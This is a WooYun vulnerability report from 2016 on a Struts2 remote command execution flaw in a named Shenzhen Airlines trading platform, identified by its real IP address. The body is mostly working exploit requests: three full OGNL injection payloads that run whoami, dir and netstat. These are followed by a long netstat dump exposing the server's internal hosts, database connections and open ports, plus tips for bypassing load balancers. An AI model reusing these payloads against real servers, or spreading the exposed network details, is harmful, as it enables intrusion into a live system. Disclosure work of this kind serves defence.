破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

深圳航空某交易平台远程执行漏洞

编号218722
Urlhttp://www.wooyun.org/bug.php?action=view&id=218722
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题深圳航空某交易平台远程执行漏洞
漏洞类型命令执行
厂商深圳航空
白帽子艺术家
提交日期2016-06-14 09:48:00
公开日期2016-06-20 15:50:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
RT
漏洞细节

ST2这里有一个地方需要突破一下,用工具是不行的。
漏洞地址:http://113.108.100.142/weballiance/cooperateCode!goSearchDemo255_300.action

1.jpg


存在漏洞。
查看下主机名。

2.jpg


POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 624
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27whoami%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


ppsc2\shenzhenair


这里有2个负载均衡,也有一些防护设备。上传文件请上传两次才能保证每台上面都有上传文件。

3.jpg


这里工具不能执行dir 命令。因为有\ /的问题,所以要自己去提交。(这个很基础,也很使用,在7.0下面经常会遇到这个问题)代码:

POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 683
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c dir /a /od D:\\apache\\apache-tomcat-7.0.32-A\\webapps%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


POST /weballiance/cooperateCode!goSearchDemo255_300.action?selColor=blue&weballiancecode=L20120515152239892420 HTTP/1.1
User-Agent: Mozilla/5.0 (baidu spider)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 641
Host: 113.108.100.142
Connection: Keep-Alive
Pragma: no-cache
Cookie:
redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27cmd.exe /c netstat -ano%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\A%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}


HTTP/1.1 200 OK
Date: Mon, 13 Jun 2016 02:39:42 GMT
Server: Apache/2.2.22 (Win32) mod_jk/1.2.37
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Length: 28721
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 8500
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 724
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:1030 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:1920 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:2425 0.0.0.0:0 LISTENING 4680
TCP 0.0.0.0:2428 0.0.0.0:0 LISTENING 4680
TCP 0.0.0.0:2621 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:2625 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2104
TCP 0.0.0.0:3661 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:4026 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:4028 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:5800 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:5900 0.0.0.0:0 LISTENING 2136
TCP 0.0.0.0:6014 0.0.0.0:0 LISTENING 1292
TCP 0.0.0.0:6129 0.0.0.0:0 LISTENING 1148
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:8068 0.0.0.0:0 LISTENING 5316
TCP 0.0.0.0:8069 0.0.0.0:0 LISTENING 5316
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 5696
TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:8088 0.0.0.0:0 LISTENING 1748
TCP 0.0.0.0:8089 0.0.0.0:0 LISTENING 1748
TCP 0.0.0.0:8098 0.0.0.0:0 LISTENING 8792
TCP 0.0.0.0:8119 0.0.0.0:0 LISTENING 8792
TCP 0.0.0.0:9009 0.0.0.0:0 LISTENING 6212
TCP 0.0.0.0:38888 0.0.0.0:0 LISTENING 2044
TCP 10.12.66.29:80 210.75.21.99:47177 ESTABLISHED 5836
TCP 10.12.66.29:139 0.0.0.0:0 LISTENING 4
TCP 10.12.66.29:1044 10.11.108.43:9080 CLOSE_WAIT 1748
TCP 10.12.66.29:1133 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1282 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:1289 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1315 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1334 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:1367 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1369 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1407 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1408 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1409 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1410 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1411 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1412 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1413 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1414 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1415 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1416 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1417 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1418 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1419 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1420 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1421 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1422 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1423 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1424 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1425 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1426 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1427 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1428 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1429 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1430 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1431 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1432 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1433 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1434 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1435 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1436 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1437 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1438 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1439 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1440 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1441 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1442 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1443 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1444 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1445 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1446 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1447 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1448 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1449 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1450 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1451 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1452 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1453 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1454 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1455 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1456 10.11.102.107:11211 ESTABLISHED 5696
TCP 10.12.66.29:1457 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1458 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1459 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1460 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1461 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1462 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1463 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1464 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1465 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1466 10.12.66.33:1521 ESTABLISHED 5696
TCP 10.12.66.29:1484 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1485 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1486 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1487 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1488 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1489 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1490 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1491 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1492 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1493 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1494 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1495 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1496 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1497 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1498 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1499 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1500 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1501 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1502 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1503 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1504 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1505 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1506 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1507 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1508 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1509 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1510 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1511 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1512 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1513 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1514 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1515 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1516 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1517 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1518 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1519 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1520 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1521 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1522 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1523 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1524 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1525 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1526 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1527 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1528 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1529 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1530 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1531 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1532 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1533 10.11.102.107:11211 ESTABLISHED 6212
TCP 10.12.66.29:1534 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1535 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1536 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1537 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1538 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1539 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1540 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1541 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1542 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1543 10.12.66.33:1521 ESTABLISHED 6212
TCP 10.12.66.29:1577 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1578 59.151.44.157:80 CLOSE_WAIT 8792
TCP 10.12.66.29:1615 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1616 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1617 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1618 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1619 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1626 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:1677 10.11.102.107:9001 CLOSE_WAIT 6212
TCP 10.12.66.29:1702 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1703 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1705 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1706 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:1727 10.11.103.83:9081 CLOSE_WAIT 8792
TCP 10.12.66.29:1792 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:1815 10.110.10.71:8014 ESTABLISHED 2424
TCP 10.12.66.29:1822 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1823 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1824 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1825 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:1830 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:1836 10.11.108.43:9080 CLOSE_WAIT 1748
TCP 10.12.66.29:1837 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:1838 59.151.45.134:80 ESTABLISHED 1748
TCP 10.12.66.29:1840 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1841 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1842 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1843 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1844 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1845 10.11.108.43:9080 CLOSE_WAIT 5316
TCP 10.12.66.29:1846 140.206.211.15:443 TIME_WAIT 0
TCP 10.12.66.29:1847 120.132.34.101:80 CLOSE_WAIT 8792
TCP 10.12.66.29:1848 63.88.100.162:80 CLOSE_WAIT 2728
TCP 10.12.66.29:1849 10.11.108.43:9080 CLOSE_WAIT 8792
TCP 10.12.66.29:1850 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1852 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1853 10.12.66.29:4028 TIME_WAIT 0
TCP 10.12.66.29:1854 10.12.66.113:139 TIME_WAIT 0
TCP 10.12.66.29:1855 10.12.66.113:139 TIME_WAIT 0
TCP 10.12.66.29:1856 10.12.66.29:4028 TIME_WAIT 0
TCP 10.12.66.29:1857 10.12.66.28:4083 TIME_WAIT 0
TCP 10.12.66.29:1858 10.12.66.28:4150 TIME_WAIT 0
TCP 10.12.66.29:1859 10.12.66.31:4045 TIME_WAIT 0
TCP 10.12.66.29:1860 10.12.66.31:3755 TIME_WAIT 0
TCP 10.12.66.29:1861 10.12.66.29:2625 TIME_WAIT 0
TCP 10.12.66.29:1862 61.155.159.101:80 TIME_WAIT 0
TCP 10.12.66.29:1863 103.37.152.53:80 ESTABLISHED 5316
TCP 10.12.66.29:1864 10.11.103.83:9081 ESTABLISHED 1748
TCP 10.12.66.29:1900 92.123.143.249:80 CLOSE_WAIT 3808
TCP 10.12.66.29:2334 63.110.60.17:80 CLOSE_WAIT 9436
TCP 10.12.66.29:2621 10.12.66.28:2199 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.28:2200 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.29:4051 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8304 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8305 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8306 ESTABLISHED 5696
TCP 10.12.66.29:2621 10.12.66.31:8307 ESTABLISHED 5696
TCP 10.12.66.29:2629 96.7.54.97:80 CLOSE_WAIT 9160
TCP 10.12.66.29:2632 10.12.66.31:3761 ESTABLISHED 5696
TCP 10.12.66.29:2636 10.12.66.31:3753 ESTABLISHED 5696
TCP 10.12.66.29:2638 10.12.66.31:4051 ESTABLISHED 5696
TCP 10.12.66.29:2640 10.12.66.28:4148 ESTABLISHED 5696
TCP 10.12.66.29:2642 10.12.66.28:4081 ESTABLISHED 5696
TCP 10.12.66.29:2644 10.12.66.31:4043 ESTABLISHED 5696
TCP 10.12.66.29:2780 10.12.65.51:6014 ESTABLISHED 1292
TCP 10.12.66.29:3031 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:3225 10.12.65.60:1918 ESTABLISHED 1292
TCP 10.12.66.29:3282 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:3586 120.132.34.101:80 CLOSE_WAIT 8792
TCP 10.12.66.29:3653 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3669 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3676 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3677 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3712 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:3722 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:3771 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3817 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:3822 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3945 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:3970 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:3990 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4011 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4026 10.12.66.28:2613 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.28:2614 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.29:4032 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11191 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11192 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11193 ESTABLISHED 6212
TCP 10.12.66.29:4026 10.12.66.31:11194 ESTABLISHED 6212
TCP 10.12.66.29:4032 10.12.66.29:4026 ESTABLISHED 5696
TCP 10.12.66.29:4034 10.12.66.31:3761 ESTABLISHED 6212
TCP 10.12.66.29:4036 10.12.66.31:3753 ESTABLISHED 6212
TCP 10.12.66.29:4038 10.12.66.31:4051 ESTABLISHED 6212
TCP 10.12.66.29:4042 10.12.66.28:4081 ESTABLISHED 6212
TCP 10.12.66.29:4045 10.12.66.28:4148 ESTABLISHED 6212
TCP 10.12.66.29:4049 10.12.66.31:4043 ESTABLISHED 6212
TCP 10.12.66.29:4051 10.12.66.29:2621 ESTABLISHED 6212
TCP 10.12.66.29:4060 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4110 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4239 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4327 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4415 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:4416 59.151.45.134:80 CLOSE_WAIT 1748
TCP 10.12.66.29:4503 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4533 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4661 10.12.66.29:8009 ESTABLISHED 5836
TCP 10.12.66.29:4736 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4737 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4761 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4763 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4794 10.11.103.83:9081 CLOSE_WAIT 1748
TCP 10.12.66.29:4803 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4813 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:4920 10.12.66.33:1521 ESTABLISHED 1748
TCP 10.12.66.29:4950 10.12.66.29:9009 ESTABLISHED 5836
TCP 10.12.66.29:4957 10.12.66.33:1521 ESTABLISHED 5316
TCP 10.12.66.29:4966 10.12.66.33:1521 ESTABLISHED 8792
TCP 10.12.66.29:5002 0.0.0.0:0 LISTENING 5696
TCP 10.12.66.29:5003 0.0.0.0:0 LISTENING 6212
TCP 10.12.66.29:8009 10.12.66.29:1615 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1616 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1617 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1618 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1619 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1822 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1823 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1824 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:1825 ESTABLISHED 5696
TCP 10.12.66.29:8009 10.12.66.29:4661 ESTABLISHED 5696
TCP 10.12.66.29:8088 10.11.102.104:4121 TIME_WAIT 0
TCP 10.12.66.29:8088 10.11.102.104:4150 TIME_WAIT 0
TCP 10.12.66.29:8088 10.11.102.104:4157 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 10.11.102.104:4219 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 10.11.102.104:4246 ESTABLISHED 1748
TCP 10.12.66.29:8088 10.11.102.104:4248 ESTABLISHED 1748
TCP 10.12.66.29:8088 10.12.67.28:3276 FIN_WAIT_2 1748
TCP 10.12.66.29:8088 59.151.29.91:61523 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61599 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61642 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:61826 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62296 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62457 TIME_WAIT 0
TCP 10.12.66.29:8088 59.151.29.91:62727 TIME_WAIT 0
TCP 10.12.66.29:9009 10.12.66.29:1702 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1703 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1705 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:1706 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:3282 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4533 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4736 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4737 ESTABLISHED 6212
TCP 10.12.66.29:9009 10.12.66.29:4950 ESTABLISHED 6212
TCP 10.12.66.29:38888 10.12.69.51:48610 ESTABLISHED 2044
TCP 127.0.0.1:1031 0.0.0.0:0 LISTENING 2500
TCP 127.0.0.1:1371 127.0.0.1:1372 ESTABLISHED 5696
TCP 127.0.0.1:1372 127.0.0.1:1371 ESTABLISHED 5696
TCP 127.0.0.1:1383 127.0.0.1:1384 ESTABLISHED 6212
TCP 127.0.0.1:1384 127.0.0.1:1383 ESTABLISHED 6212
TCP 127.0.0.1:1391 127.0.0.1:1392 ESTABLISHED 5696
TCP 127.0.0.1:1392 127.0.0.1:1391 ESTABLISHED 5696
TCP 127.0.0.1:1393 127.0.0.1:1394 ESTABLISHED 5696
TCP 127.0.0.1:1394 127.0.0.1:1393 ESTABLISHED 5696
TCP 127.0.0.1:1395 127.0.0.1:1396 ESTABLISHED 5696
TCP 127.0.0.1:1396 127.0.0.1:1395 ESTABLISHED 5696
TCP 127.0.0.1:1397 127.0.0.1:1398 ESTABLISHED 5696
TCP 127.0.0.1:1398 127.0.0.1:1397 ESTABLISHED 5696
TCP 127.0.0.1:1399 127.0.0.1:1400 ESTABLISHED 5696
TCP 127.0.0.1:1400 127.0.0.1:1399 ESTABLISHED 5696
TCP 127.0.0.1:1401 127.0.0.1:1402 ESTABLISHED 5696
TCP 127.0.0.1:1402 127.0.0.1:1401 ESTABLISHED 5696
TCP 127.0.0.1:1403 127.0.0.1:1404 ESTABLISHED 5696
TCP 127.0.0.1:1404 127.0.0.1:1403 ESTABLISHED 5696
TCP 127.0.0.1:1405 127.0.0.1:1406 ESTABLISHED 5696
TCP 127.0.0.1:1406 127.0.0.1:1405 ESTABLISHED 5696
TCP 127.0.0.1:1467 127.0.0.1:1468 ESTABLISHED 6212
TCP 127.0.0.1:1468 127.0.0.1:1467 ESTABLISHED 6212
